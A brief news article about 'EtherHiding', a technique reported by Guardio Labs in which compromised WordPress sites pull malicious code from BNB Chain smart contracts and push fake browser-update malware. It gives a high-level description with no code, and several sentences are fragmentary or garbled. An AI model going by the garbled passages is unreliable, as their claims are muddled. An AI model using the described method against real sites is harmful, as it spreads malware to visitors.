Close
Cybercriminals have devised a cunning way to spread malware, using BNB Chain (BSC) smart contracts to hide malware and distribute malicious code, tricking unsuspecting users.
EtherHiding: A new approach to hide malicious code in the blockchain has been unveiled. Cybercriminals have devised a cunning way to spread malware, using BNB Chain (BSC) smart contracts to hide malware and distribute malicious code, tricking unsuspecting users. Security researchers at Guardio Labs unveiled the technique, known as EtherHiding, in a report on October 15.
The attack is revealed by infiltrating WordPress websites, injecting code that retrieves partial payloads from blockchain contracts. These payloads are hidden in BSC smart contracts and act as anonymous hosting platforms for malicious code.
One of the distinguishing features of this technique is the ability of hackers to update the code and change their attack methods at will. Recent attacks have taken the form of fake browser updates. where victims receive prompts to refresh their browsers via fake landing pages and links.
which retrieves additional code from the attackers’ domains and eventually leads to complete website destruction with fake browser update notifications that distribute the malware.
The flexibility of this attack chain allows threat actors to easily replace malicious code with each new blockchain transaction, making mitigation efforts challenging. As highlighted by Nati Tal, head of cybersecurity at Guardio Labs, and fellow security researcher Oleg Zaitsev.
They operate independently and Binance relies on its developer community to flag malicious code in contracts. Guardio emphasized the vulnerability of WordPress websites, which power about 43% of all websites, and urged site owners to increase their security measures. It emphasized that these sites often act as the main gateways for threats to a large number of potential victims.
The company also concluded that the emergence of Web 3 and blockchain technology new ways. opens it up to unchecked malicious campaigns and emphasizes the need for adaptive defenses to combat these emerging threats.
Embrace this opportunity to preserve this article as an NFT, commemorating this moment in history and showing support for independent journalism in the cryptocurrency space.
